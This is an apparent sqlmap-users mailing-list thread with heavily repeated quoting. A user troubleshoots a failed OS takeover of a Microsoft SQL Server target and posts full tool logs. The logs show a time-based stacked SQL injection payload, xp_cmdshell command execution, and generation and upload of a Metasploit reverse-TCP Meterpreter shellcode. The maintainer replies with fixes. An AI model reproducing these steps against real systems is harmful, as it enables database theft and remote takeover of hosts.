> --sql-shell fail due to lack of stack-query related issues.
>
> In that case is there a way to upload a file which is not malicious if
> objective is not to take control of system and just requires uploading a
> file.
>
>
>
>
>
> ------------------------------------------------------------------------------
> Don't Limit Your Business. Reach for the Cloud.
> GigeNET's Cloud Solutions provide you with the tools and support that
> you need to offload your IT needs and focus on growing your business.
> Configured For All Businesses. Start Your Cloud Today.
> https://www.gigenetcloud.com/
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 4
Date: Thu, 2 Jul 2015 00:26:30 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Error with operating system takeover
	(meterpreter)
To: Peter Laboratra <myp...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID:
	<CA+...@ma...>
Content-Type: text/plain; charset="utf-8"

Hi.

1) First of all, please don't restrain sqlmap to only use "stacked" SQLi.
That way you'll kill the possibility to get perfectly valid results with
other techniques
2) In current state, you've got some "trashy" characters (because of
combination of laggy connection and stacked SQLi), like: "D:/Program
Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo ?". Please use
--fresh-queries in such situations (once per run where you expect resume of
trashy chars) to force sqlmap to try to retrieve the problematic value once
again.

Bye

On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...>
wrote:

> Hi All,
>
> In first phase of our test we discovered Target URL is vulnerable and we
> managed to retrieved lots of information such as --users, --dbs, some of
> --tables and lots more. All this retrieval was very slow probably due to
> time-based vulnerability; however tried through all (BEUSTQ) and found same
> state.
>
> During an attempt after few days of our success we noticed some of the
> parameter is not working and we are receiving errors like for instance
> during requery for --users we received error "[09:39:23] [CRITICAL] unable
> to retrieve the number of database users". During requery for -U sa
> --passwords we received "unnable to retrieve the password hashes for the
> database users (probably because the session user has no read privileges
> over the relevant system database table)".
>
> We moved to OS takeover, initially get error for xp_cmdshell however
> activated and confirmed using SQLNinja and moved on to get --os-shell,
> executed some of commands like "hostname", "whoami" and successfully
> retrieved its output.
>
> Now after few minutes we noted that we are not getting any output of any
> command with message "No output".
>
> We moved to --os-pwn + --msf-path, But again with no success on
> meterpreter or VNC.
> received error "HTTP error codes detected during run:
> 404 (Not Found) - 1 times"
>
> I'm attaching screen log, please help me with this if thr is any scope
> available.
> Thanks in Advance.
>
>
>
> -------screen logs start-------
>
> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
> test_msf7 -v 2
>          _
>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
> |_ -| . | |     | .'| . |
> |___|_  |_|_|_|_|__,|  _|
>       |_|           |_|   http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
> mutual consent is illegal. It is the end user's responsibility to obey all
> applicable local, state and federal laws. Developers assume no liability
> and are not responsible for any misuse or damage caused by this program
>
> [*] starting at 10:03:33
>
> mytarget_login
> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
> [10:03:33] [DEBUG] not a valid WebScarab log data
> [10:03:33] [DEBUG] cleaning up configuration parameters
> test_msf7
> mytarget_login
> /opt/metasploit/apps/pro/msf3
> [10:03:33] [INFO] setting file for logging HTTP traffic
> [10:03:33] [DEBUG] setting the HTTP timeout
> [10:03:33] [DEBUG] creating HTTP requests opener object
> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
> [10:03:33] [DEBUG] provided Metasploit Framework path
> '/opt/metasploit/apps/pro/msf3' is valid
> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the Cookie
> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
> [10:03:33] [INFO] testing connection to the target URL
> [10:03:48] [DEBUG] declared web page charset 'utf-8'
> sqlmap got a 302 redirect to '
> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to
> follow? [Y/n] Y
> redirect is a result of a POST request. Do you want to resend original
> POST data to a new location? [Y/n] Y
> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104] Connection
> reset by peer')
> [10:03:56] [DEBUG] heuristically checking if the target is protected by
> some kind of WAF/IPS/IDS
> sqlmap identified the following injection points with a total of 0 HTTP(s)
> requests:
> ---
> Parameter: testNumber (POST)
>     Type: stacked queries
>     Title: Microsoft SQL Server/Sybase stacked queries
>     Payload:
> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
> WAITFOR DELAY '0:0:5'--&testPassword=3243
>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
> ---
> [10:03:56] [INFO] testing Microsoft SQL Server
> [10:03:56] [INFO] confirming Microsoft SQL Server
> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
> back-end DBMS: Microsoft SQL Server 2008
> how do you want to establish the tunnel?
> [1] TCP: Metasploit Framework (default)
> [2] ICMP: icmpsh - ICMP tunneling
> > 1
> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo ? as temporary files directory
> [10:04:00] [INFO] testing if current user is DBA
> [10:04:00] [DEBUG] creating a support table to write commands standard
> output to
> [10:04:00] [WARNING] time-based comparison requires larger statistical
> model, please wait..............................
> [10:04:04] [WARNING] it is very important not to stress the network
> adapter during usage of time-based payloads to prevent potential errors
> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
> [10:04:04] [WARNING] in case of continuous data retrieval problems you are
> advised to try a switch '--no-cast' or switch '--hex'
> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
> which connection type do you want to use?
> [1] Reverse TCP: Connect back from the database host to this machine
> (default)
> [2] Reverse TCP: Try to connect back from the database host to this
> machine, on all ports example3ween the specified and 65535
> [3] Reverse HTTP: Connect back from the database host to this machine
> tunnelling traffic over HTTP
> [4] Reverse HTTPS: Connect back from the database host to this machine
> tunnelling traffic over HTTPS
> [5] Bind TCP: Listen on the database host for a connection
> > 1
> what is the local address? [192.168.1.8]
> which local port number do you want to use? [61371]
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> > 1
> [10:04:17] [DEBUG] executing local command:
> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
> /opt/metasploit/apps/pro/msf


[il messaggio originale non è incluso]

Re: [sqlmap-users] Error with operating system takeover (meterpreter)

[Peter L. <myp...@gm...>]

Hi

This time I tried --flush-session as well and now it is showing that the
parameter is not injectable; however when I'm using old session with (-s
old_sessionfile.sqlite) it is not showing this.

Observed similar issue when few days back I tried to sqlinject same
vulnerable parameter using sqlmap from Computer-2; it failed to identify
vulnerability in target parameter; however at the same time it was working
with Computer-1. Did tried --time-sec, -o etc. This is another weird issue
in addition to OS Pwning.


--start--
sqlmap -r mytarget_login -p testNumber --os-pwn
--msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf_newSession -v 2
--fresh-queries --flush-session
..
..
[05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 31 to 40
columns' because the level (4) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 31
to 40 columns' because the level (5) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (NULL) - 41 to 50
columns' because the level (5) is higher than the provided (1)
[05:20:28] [DEBUG] skipping test 'Generic UNION query (random number) - 41
to 50 columns' because the level (5) is higher than the provided (1)
[05:20:28] [WARNING] POST parameter 'testNumber' is not injectable
[05:20:28] [CRITICAL] all tested parameters appear to be not injectable.
Try to increase '--level'/'--risk' values to perform more tests. Also, you
can try to rerun by providing either a valid value for option '--string'
(or '--regexp') If you suspect that there is some kind of protection
mechanism involved (e.g. WAF) maybe you could retry with an option
'--tamper' (e.g. '--tamper=space2comment')

[*] shutting down at 05:20:28
--end--

On Thu, Jul 2, 2015 at 2:11 PM, Miroslav Stampar <mir...@gm...
> wrote:

> In your case, 404 is indication that file has not been found in the
> expected place.
>
> Now I see that the temporary file path is not being "refreshed" by the
> --fresh-queries. Please rerun the whole case with the --flush-session
>
> Bye
>
> p.s. in your case sqlmap tried to upload the file to the trashy location
> because of previously retrieved faulty temp location
>
> On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <myp...@gm...>
> wrote:
>
>> Hi,
>> Thanks for your reply.
>>
>> This time I tried with --fresh-queries without specific --techniques.
>>
>> why am I getting error "page not found (404)" again and again? Does it
>> indicate that file is being written but is deleted by Anti-Virus control or
>> something and that's why while calling the uploaded file 404 error is
>> appearing, Can this be the case ? Need your opinion and expertise.
>>
>>
>> Thanks
>>
>>
>> --start---
>>
>> root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn
>> --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries
>>
>>
>> which payload do you want to use?
>> [1] Meterpreter (default)
>> [2] Shell
>> [3] VNC
>> > 1
>> [11:12:52] [DEBUG] executing local command:
>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
>> EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R |
>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o
>> "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
>> [11:12:52] [INFO] creation in progress .................. done
>> [11:13:10] [DEBUG] the shellcode size is 308 bytes
>> [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
>> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
>> [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL
>> injection technique
>> [11:13:10] [INFO] using PowerShell to write the binary file content to
>> file 'D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe'
>> [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program
>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt,
>> please wait..
>> [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to
>> D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1
>> [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to
>> write the D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait..
>> [11:13:12] [WARNING] if you experience problems with non-ASCII identifier
>> names you are advised to rerun with '--tamper=charunicodeencode'
>> [11:13:12] [DEBUG] checking the length of the remote file D:\Program
>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe
>> [11:13:12] [INFO] retrieved:
>> [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
>> [11:13:13] [WARNING] it looks like the file has not been written (usually
>> occurs if the DBMS process' user has no write privileges in the destination
>> path)
>> do you want to try to upload the file with the custom Visual Basic script
>> technique? [Y/n] y
>> [11:13:15] [INFO] using a custom visual basic script to write the binary
>> file content to file 'D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait..
>> [11:13:15] [DEBUG] uploading the file base64-encoded content to
>> D:\Program Files\Microsoft SQL
>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt, please wait..
>> [11:13:16] [CRITICAL] page not found (404)
>> [11:13:16] [WARNING] HTTP error codes detected during run:
>> 404 (Not Found) - 1 times
>> [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
>> that some kind of protection is involved (e.g. WAF)
>>
>> [*] shutting down at 11:13:16
>>
>>
>> --end---
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>>
>> On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <
>> mir...@gm...> wrote:
>>
>>> Hi.
>>>
>>> 1) First of all, please don't restrain sqlmap to only use "stacked"
>>> SQLi. That way you'll kill the possibility to get perfectly valid results
>>> with other techniques
>>> 2) In current state, you've got some "trashy" characters (because of
>>> combination of laggy connection and stacked SQLi), like: "D:/Program
>>> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use
>>> --fresh-queries in such situations (once per run where you expect resume of
>>> trashy chars) to force sqlmap to try to retrieve the problematic value once
>>> again.
>>>
>>> Bye
>>>
>>> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...>
>>> wrote:
>>>
>>>> Hi All,
>>>>
>>>> In first phase of our test we discovered Target URL is vulnerable and
>>>> we managed to retrieved lots of information such as --users, --dbs, some of
>>>> --tables and lots more. All this retrieval was very slow probably due to
>>>> time-based vulnerability; however tried through all (BEUSTQ) and found same
>>>> state.
>>>>
>>>> During an attempt after few days of our success we noticed some of the
>>>> parameter is not working and we are receiving errors like for instance
>>>> during requery for --users we received error "[09:39:23] [CRITICAL] unable
>>>> to retrieve the number of database users". During requery for -U sa
>>>> --passwords we received "unnable to retrieve the password hashes for the
>>>> database users (probably because the session user has no read privileges
>>>> over the relevant system database table)".
>>>>
>>>> We moved to OS takeover, initially get error for xp_cmdshell however
>>>> activated and confirmed using SQLNinja and moved on to get --os-shell,
>>>> executed some of commands like "hostname", "whoami" and successfully
>>>> retrieved its output.
>>>>
>>>> Now after few minutes we noted that we are not getting any output of
>>>> any command with message "No output".
>>>>
>>>> We moved to --os-pwn + --msf-path, But again with no success on
>>>> meterpreter or VNC.
>>>> received error "HTTP error codes detected during run:
>>>> 404 (Not Found) - 1 times"
>>>>
>>>> I'm attaching screen log, please help me with this if thr is any scope
>>>> available.
>>>> Thanks in Advance.
>>>>
>>>>
>>>>
>>>> -------screen logs start-------
>>>>
>>>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
>>>> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
>>>> test_msf7 -v 2
>>>>          _
>>>>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
>>>> |_ -| . | |     | .'| . |
>>>> |___|_  |_|_|_|_|__,|  _|
>>>>       |_|           |_|   http://sqlmap.org
>>>>
>>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>>> prior mutual consent is illegal. It is the end user's responsibility to
>>>> obey all applicable local, state and federal laws. Developers assume no
>>>> liability and are not responsible for any misuse or damage caused by this
>>>> program
>>>>
>>>> [*] starting at 10:03:33
>>>>
>>>> mytarget_login
>>>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>>>> [10:03:33] [DEBUG] not a valid WebScarab log data
>>>> [10:03:33] [DEBUG] cleaning up configuration parameters
>>>> test_msf7
>>>> mytarget_login
>>>> /opt/metasploit/apps/pro/msf3
>>>> [10:03:33] [INFO] setting file for logging HTTP traffic
>>>> [10:03:33] [DEBUG] setting the HTTP timeout
>>>> [10:03:33] [DEBUG] creating HTTP requests opener object
>>>> [10:03:33] [DEBUG] forcing back-end DBMS to user defined value
>>>> [10:03:33] [DEBUG] setting the takeover out-of-band functionality
>>>> [10:03:33] [DEBUG] provided Metasploit Framework path
>>>> '/opt/metasploit/apps/pro/msf3' is valid
>>>> [10:03:33] [DEBUG] provided parameter 'testNumber' is not inside the
>>>> Cookie
>>>> [10:03:33] [DEBUG] resolving hostname 'mytarget.com'
>>>> [10:03:33] [INFO] testing connection to the target URL
>>>> [10:03:48] [DEBUG] declared web page charset 'utf-8'
>>>> sqlmap got a 302 redirect to '
>>>> https://mytarget.com/tryexample_ex/prelacego.aspx'. Do you want to
>>>> follow? [Y/n] Y
>>>> redirect is a result of a POST request. Do you want to resend original
>>>> POST data to a new location? [Y/n] Y
>>>> [10:03:56] [DEBUG] SSL connection error occurred ('[Errno 104]
>>>> Connection reset by peer')
>>>> [10:03:56] [DEBUG] heuristically checking if the target is protected by
>>>> some kind of WAF/IPS/IDS
>>>> sqlmap identified the following injection points with a total of 0
>>>> HTTP(s) requests:
>>>> ---
>>>> Parameter: testNumber (POST)
>>>>     Type: stacked queries
>>>>     Title: Microsoft SQL Server/Sybase stacked queries
>>>>     Payload:
>>>> example3String=MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ|MQ&tryID=2&Totalexample2=1&example2Pointer=0&testNumber=333333333333';
>>>> WAITFOR DELAY '0:0:5'--&testPassword=3243
>>>>     Vector: ; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'--
>>>> ---
>>>> [10:03:56] [INFO] testing Microsoft SQL Server
>>>> [10:03:56] [INFO] confirming Microsoft SQL Server
>>>> [10:03:56] [INFO] the back-end DBMS is Microsoft SQL Server
>>>> back-end DBMS: Microsoft SQL Server 2008
>>>> how do you want to establish the tunnel?
>>>> [1] TCP: Metasploit Framework (default)
>>>> [2] ICMP: icmpsh - ICMP tunneling
>>>> > 1
>>>> [10:04:00] [DEBUG] going to use D:/Program Files/Microsoft SQL
>>>> Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā as temporary files directory
>>>> [10:04:00] [INFO] testing if current user is DBA
>>>> [10:04:00] [DEBUG] creating a support table to write commands standard
>>>> output to
>>>> [10:04:00] [WARNING] time-based comparison requires larger statistical
>>>> model, please wait..............................
>>>> [10:04:04] [WARNING] it is very important not to stress the network
>>>> adapter during usage of time-based payloads to prevent potential errors
>>>> [10:04:04] [INFO] testing if xp_cmdshell extended procedure is usable
>>>> [10:04:04] [DEBUG] performed 3 queries in 0.26 seconds
>>>> [10:04:04] [WARNING] in case of continuous data retrieval problems you
>>>> are advised to try a switch '--no-cast' or switch '--hex'
>>>> [10:04:05] [ERROR] unable to retrieve xp_cmdshell output
>>>> [10:04:05] [INFO] creating Metasploit Framework multi-stage shellcode
>>>> which connection type do you want to use?
>>>> [1] Reverse TCP: Connect back from the database host to this machine
>>>> (default)
>>>> [2] Reverse TCP: Try to connect back from the database host to this
>>>> machine, on all ports example3ween the specified and 65535
>>>> [3] Reverse HTTP: Connect back from the database host to this machine
>>>> tunnelling traffic over HTTP
>>>> [4] Reverse HTTPS: Connect back from the database host to this machine
>>>> tunnelling traffic over HTTPS
>>>> [5] Bind TCP: Listen on the database host for a connection
>>>> > 1
>>>> what is the local address? [192.168.1.8]
>>>> which local port number do you want to use? [61371]
>>>> which payload do you want to use?
>>>> [1] Meterpreter (default)
>>>> [2] Shell
>>>> [3] VNC
>>>> > 1
>>>> [10:04:17] [DEBUG] executing local command:
>>>> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
>>>> EXITFUNC=process MQORT=61371 LHOST=192.168.1.8 R |
>>>> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/aMQha_mixed -o
>>>> "/root/.sqlmap/output/mytarget.com/tmpmbykt" -t raw BufferRegister=EAX
>>>> [10:04:17] [INFO] creation in progress .................. done
>>>> [10:04:35] [DEBUG] the shellcode size is 308 bytes
>>>> [10:04:35] [INFO] uploading shellcodeexec to 'D:/Program
>>>> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā/tmpsebykt.exe'
>>>> [10:04:35] [DEBUG] going to upload the binary file with stacked query
>>>> SQL injection technique
>>>> [10:04:35] [INFO] using PowerShell to write the binary file content to
>>>> file 'D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>>> Ā\tmpsebykt.exe'
>>>> [10:04:35] [DEBUG] uploading the base64-encoded file to D:\Program
>>>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpfidjf.txt,
>>>> please wait..
>>>> [10:04:36] [DEBUG] uploading the PowerShell base64-decoding script to
>>>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>>> Ā\tmppsbcbi.ps1
>>>> [10:04:36] [DEBUG] executing the PowerShell base64-decoding script to
>>>> write the D:\Program Files\Microsoft SQL
>>>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe file, please wait..
>>>> [10:04:37] [WARNING] if you experience problems with non-ASCII
>>>> identifier names you are advised to rerun with '--tamper=charunicodeencode'
>>>> [10:04:37] [DEBUG] checking the length of the remote file D:\Program
>>>> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe
>>>> [10:04:37] [INFO] retrieved:
>>>> [10:04:37] [DEBUG] performed 3 queries in 0.26 seconds
>>>> [10:04:37] [WARNING] it looks like the file has not been written
>>>> (usually occurs if the DBMS process' user has no write privileges in the
>>>> destination path)
>>>> do you want to try to upload the file with the custom Visual Basic
>>>> script technique? [Y/n] Y
>>>> [10:04:41] [INFO] using a custom visual basic script to write the
>>>> binary file content to file 'D:\Program Files\Microsoft SQL
>>>> Server\MSSQ^10.MSSQLSERVER\MSSQLaLo Ā\tmpsebykt.exe', please wait..
>>>> [10:04:41] [DEBUG] uploading the file base64-encoded content to
>>>> D:\Program Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLo
>>>> Ā\tmpfegab.txt, please wait..
>>>> [10:04:41] [CRITICAL] page not found (404)
>>>> [10:04:41] [WARNING] HTTP error codes detected during run:
>>>> 404 (Not Found) - 1 times
>>>> [10:04:41] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
>>>> that some kind of protection is involved (e.g. WAF)
>>>>
>>>> [*] shutting down at 10:04:41
>>>>
>>>> root@kali:~#
>>>>
>>>>
>>>> -------screen logs end-------
>>>>
>>>>
>>>> Please help!!
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> Don't Limit Your Business. Reach for the Cloud.
>>>> GigeNET's Cloud Solutions provide you with the tools and support that
>>>> you need to offload your IT needs and focus on growing your business.
>>>> Configured For All Businesses. Start Your Cloud Today.
>>>> https://www.gigenetcloud.com/
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>>
>>> --
>>> Miroslav Stampar
>>> http://about.me/stamparm
>>>
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>

Re: [sqlmap-users] Error with operating system takeover (meterpreter)

[Miroslav S. <mir...@gm...>]

In your case, 404 is indication that file has not been found in the
expected place.

Now I see that the temporary file path is not being "refreshed" by the
--fresh-queries. Please rerun the whole case with the --flush-session

Bye

p.s. in your case sqlmap tried to upload the file to the trashy location
because of previously retrieved faulty temp location

On Thu, Jul 2, 2015 at 9:13 AM, Peter Laboratra <myp...@gm...>
wrote:

> Hi,
> Thanks for your reply.
>
> This time I tried with --fresh-queries without specific --techniques.
>
> why am I getting error "page not found (404)" again and again? Does it
> indicate that file is being written but is deleted by Anti-Virus control or
> something and that's why while calling the uploaded file 404 error is
> appearing, Can this be the case ? Need your opinion and expertise.
>
>
> Thanks
>
>
> --start---
>
> root@kali:~# sqlmap -r mytarget_login -p testNumber --os-pwn
> --msf-path="/opt/metasploit/apps/pro/msf3" -t test_msf8 -v 2 --fresh-queries
>
>
> which payload do you want to use?
> [1] Meterpreter (default)
> [2] Shell
> [3] VNC
> > 1
> [11:12:52] [DEBUG] executing local command:
> /opt/metasploit/apps/pro/msf3/msfpayload windows/meterpreter/reverse_tcp
> EXITFUNC=process LPORT=20652 LHOST=192.168.1.8 R |
> /opt/metasploit/apps/pro/msf3/msfencode -a x86 -e x86/alpha_mixed -o
> "/root/.sqlmap/output/myexample.com/tmpmwjvg" -t raw BufferRegister=EAX
> [11:12:52] [INFO] creation in progress .................. done
> [11:13:10] [DEBUG] the shellcode size is 308 bytes
> [11:13:10] [INFO] uploading shellcodeexec to 'D:/Program Files/Microsoft
> SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLoĀ/tmpsewjvg.exe'
> [11:13:10] [DEBUG] going to upload the binary file with stacked query SQL
> injection technique
> [11:13:10] [INFO] using PowerShell to write the binary file content to
> file 'D:\Program Files\Microsoft SQL
> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe'
> [11:13:10] [DEBUG] uploading the base64-encoded file to D:\Program
> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfyort.txt,
> please wait..
> [11:13:12] [DEBUG] uploading the PowerShell base64-decoding script to
> D:\Program Files\Microsoft SQL
> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmppsfpoc.ps1
> [11:13:12] [DEBUG] executing the PowerShell base64-decoding script to
> write the D:\Program Files\Microsoft SQL
> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe file, please wait..
> [11:13:12] [WARNING] if you experience problems with non-ASCII identifier
> names you are advised to rerun with '--tamper=charunicodeencode'
> [11:13:12] [DEBUG] checking the length of the remote file D:\Program
> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe
> [11:13:12] [INFO] retrieved:
> [11:13:13] [DEBUG] performed 3 queries in 0.37 seconds
> [11:13:13] [WARNING] it looks like the file has not been written (usually
> occurs if the DBMS process' user has no write privileges in the destination
> path)
> do you want to try to upload the file with the custom Visual Basic script
> technique? [Y/n] y
> [11:13:15] [INFO] using a custom visual basic script to write the binary
> file content to file 'D:\Program Files\Microsoft SQL
> Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpsewjvg.exe', please wait..
> [11:13:15] [DEBUG] uploading the file base64-encoded content to D:\Program
> Files\Microsoft SQL Server\MSSQ^10.MSSQLSERVER\MSSQLaLoĀ\tmpfzlhn.txt,
> please wait..
> [11:13:16] [CRITICAL] page not found (404)
> [11:13:16] [WARNING] HTTP error codes detected during run:
> 404 (Not Found) - 1 times
> [11:13:16] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean
> that some kind of protection is involved (e.g. WAF)
>
> [*] shutting down at 11:13:16
>
>
> --end---
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
>
> On Thu, Jul 2, 2015 at 3:56 AM, Miroslav Stampar <
> mir...@gm...> wrote:
>
>> Hi.
>>
>> 1) First of all, please don't restrain sqlmap to only use "stacked" SQLi.
>> That way you'll kill the possibility to get perfectly valid results with
>> other techniques
>> 2) In current state, you've got some "trashy" characters (because of
>> combination of laggy connection and stacked SQLi), like: "D:/Program
>> Files/Microsoft SQL Server/MSSQ^10.MSSQLSERVER/MSSQLaLo Ā". Please use
>> --fresh-queries in such situations (once per run where you expect resume of
>> trashy chars) to force sqlmap to try to retrieve the problematic value once
>> again.
>>
>> Bye
>>
>> On Wed, Jul 1, 2015 at 4:55 PM, Peter Laboratra <myp...@gm...>
>> wrote:
>>
>>> Hi All,
>>>
>>> In first phase of our test we discovered Target URL is vulnerable and we
>>> managed to retrieved lots of information such as --users, --dbs, some of
>>> --tables and lots more. All this retrieval was very slow probably due to
>>> time-based vulnerability; however tried through all (BEUSTQ) and found same
>>> state.
>>>
>>> During an attempt after few days of our success we noticed some of the
>>> parameter is not working and we are receiving errors like for instance
>>> during requery for --users we received error "[09:39:23] [CRITICAL] unable
>>> to retrieve the number of database users". During requery for -U sa
>>> --passwords we received "unnable to retrieve the password hashes for the
>>> database users (probably because the session user has no read privileges
>>> over the relevant system database table)".
>>>
>>> We moved to OS takeover, initially get error for xp_cmdshell however
>>> activated and confirmed using SQLNinja and moved on to get --os-shell,
>>> executed some of commands like "hostname", "whoami" and successfully
>>> retrieved its output.
>>>
>>> Now after few minutes we noted that we are not getting any output of any
>>> command with message "No output".
>>>
>>> We moved to --os-pwn + --msf-path, But again with no success on
>>> meterpreter or VNC.
>>> received error "HTTP error codes detected during run:
>>> 404 (Not Found) - 1 times"
>>>
>>> I'm attaching screen log, please help me with this if thr is any scope
>>> available.
>>> Thanks in Advance.
>>>
>>>
>>>
>>> -------screen logs start-------
>>>
>>> root@kali:~# sqlmap -r mytarget_login -p testNumber --technique=S
>>> --dbms=mssql --os-pwn --msf-path="/opt/metasploit/apps/pro/msf3" -t
>>> test_msf7 -v 2
>>>          _
>>>  ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150519}
>>> |_ -| . | |     | .'| . |
>>> |___|_  |_|_|_|_|__,|  _|
>>>       |_|           |_|   http://sqlmap.org
>>>
>>> [!] legal disclaimer: Usage of sqlmap for attacking targets without
>>> prior mutual consent is illegal. It is the end user's responsibility to
>>> obey all applicable local, state and federal laws. Developers assume no
>>> liability and are not responsible for any misuse or damage caused by this
>>> program
>>>
>>> [*] starting at 10:03:33
>>>
>>> mytarget_login
>>> [10:03:33] [INFO] parsing HTTP request from 'mytarget_login'
>>> [10:03:33] [DEBUG] not a valid WebScarab log data
>>> [10:03:33] [DEBUG] cleaning up configuration parameters
>>> test_msf7
>>> mytarget_login
>>> /opt/metasploit/apps/pro/msf3
>>> [10:03:33] [INFO] setting file for logging HTTP traffic
>>> [10:03:33] [DEBUG] setting the HTTP timeout
>>> [10:03:33] [DEBUG] creating HTTP requests opener object
